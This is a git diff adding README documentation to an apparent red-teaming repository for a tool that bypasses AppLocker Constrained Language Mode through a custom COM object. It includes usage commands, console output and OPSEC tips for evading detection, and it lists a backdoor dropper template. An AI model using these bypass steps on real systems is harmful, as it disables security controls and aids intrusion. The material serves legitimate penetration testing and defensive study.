diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/README.md b/red-teaming/Bypass-ConstrainedLanguageMode/README.md index e69de29..1dfcacf 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/README.md +++ b/red-teaming/Bypass-ConstrainedLanguageMode/README.md @@ -0,0 +1,88 @@ + + +### `Bypass-ConstrainedLanguageMode` + +Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) +This directory contains three DLLs, namely: +- `ClmDisableDll86.dll`, +- `ClmDisableDll64.dll`, +- `ClmDisableAssembly.dll`. + +They are going to be copied into `%TEMP%` directory. Then one of Powershell scripts choosen will create a COM object pointing to `ClmDisableDllYY.dll` library (depending on platform architecture detected). +This effectively COM will instantiate an `InProcServer32` dll that is a native _.NET4 CLR host_ responsible for loading provided assembly in current AppDomain. The assembly will finally put a `FullLanguage` value into `LanguageMode` property of session data context. This should disable CLM for current Runspace. + +Three scripts constitute this bypass, whereas the use of only one is sufficient: + - `Bypass-CLM.ps1` - the original one, that is inteded to be put side by side with three acompanying files. It does not include any of that DLL files, merely copies them to TEMP, creates a COM object and instantiates a new instance of that COM. + - `Bypass-CLM2.ps1` - the same as above but with the difference that it embeds all of the three DLL files in form of a Base64 encoded blob. This blob will be then written to TEMP in form of text file, which will get decoded using `certutil -decode` (**OPSEC Warning!**) + - `Bypass-CLM-Mini.ps1` - the same as above (`Bypass-CLM2.ps1`) but with the difference that the entire script was itself Base64 encoded. It will be decoded using `certutil -decode` (**OPSEC Warning!**) and then proceeds with it's logic. + +Successful launch of these script looks as follows: + +``` +PS > $ExecutionContext.SessionState.LanguageMode +ConstrainedLanguage +PS > .\Bypass-CLM.ps1 + AppLocker Constrined Language Mode Bypass via COM + (implementation of: @xpn's technique, as documented in:) + (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) + + Re-implemented, enhanced by: Mariusz B., mgeeky + ----- + +[.] Step 0. Planted DLL files in: + C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll + C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll +[.] Step 1. Creating custom COM object. +[.] Step 2. Invoking it (ClmDisableDll)... + Powershell runspace Thread ID: 8716 +[+] Managed mode assembly. Disabling CLM globally. + Current thread ID (managed/unmanaged): 8 / 8716 + Passed argument: '(called from native CLR host)' + +============ +Use below command to disable CLM on Demand (ignore errors): + + PS> New-Object -ComObject ClmDisableDll + +============ + +[+] Finished. CLM status: FullLanguage + +PS > New-Object -ComObject ClmDisableDll +PS > $ExecutionContext.SessionState.LanguageMode +FullLanguage +``` + +And for the mini version of that script: + +``` +PS > .\Bypass-CLM-Mini.ps1 +Input Length = 308574 +Output Length = 115712 +CertUtil: -decode command completed successfully. +[+] Managed mode assembly. Disabling CLM globally. + Current thread ID (managed/unmanaged): 8 / 8716 + Passed argument: '(called from native CLR host)' + +[+] Finished. CLM status: FullLanguage +``` + +Since this script only alters static variable determining CLM mode from within a separated Runspace dedicated to loaded Assembly, we need to instantiate our own COM object within working Powershell environment like so: + +``` +PS> $ExecutionContext.SessionState.LanguageMode +ConstrainedLanguage + +PS> New-Object -ComObject ClmDisableDll + +PS> $ExecutionContext.SessionState.LanguageMode +FullLanguage +``` + +Any further commands will be executed in CLM disabled runspace. + +Things to consider for **OPSEC**: +- This script comes with three additional DLL files: `ClmDisable86.dll`, `ClmDisable64.dll`, `ClmDisableAssembly.dll`. They're going to be inserted into `%TEMP%`. +- Scipts `Bypass-CLM2.ps1` and `Bypass-CLM-Mini.ps1` create text files within `%TEMP%` and use `certutil -decode` to base64 decode them. +- This bypass works only for the current Runspace, therefore it is required to put your commands at the end of these `Bypass-*.ps1` scripts or to instantiate a New-Object within working PowerShell environment to leverage the bypass. + diff --git a/red-teaming/README.md b/red-teaming/README.md index 2b10328..93e49f0 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -4,6 +4,44 @@ - **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac)) +- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) +The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself. + +``` +PS > $ExecutionContext.SessionState.LanguageMode +ConstrainedLanguage +PS > .\Bypass-CLM.ps1 + AppLocker Constrined Language Mode Bypass via COM + (implementation of: @xpn's technique, as documented in:) + (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) + + Re-implemented, enhanced by: Mariusz B., mgeeky + ----- + +[.] Step 0. Planted DLL files in: + C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll + C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll +[.] Step 1. Creating custom COM object. +[.] Step 2. Invoking it (ClmDisableDll)... + Powershell runspace Thread ID: 8716 +[+] Managed mode assembly. Disabling CLM globally. + Current thread ID (managed/unmanaged): 8 / 8716 + Passed argument: '(called from native CLR host)' + +============ +Use below command to disable CLM on Demand (ignore errors): + + PS> New-Object -ComObject ClmDisableDll + +============ + +[+] Finished. CLM status: FullLanguage + +PS > New-Object -ComObject ClmDisableDll +PS > $ExecutionContext.SessionState.LanguageMode +FullLanguage +``` + - **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015)) - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)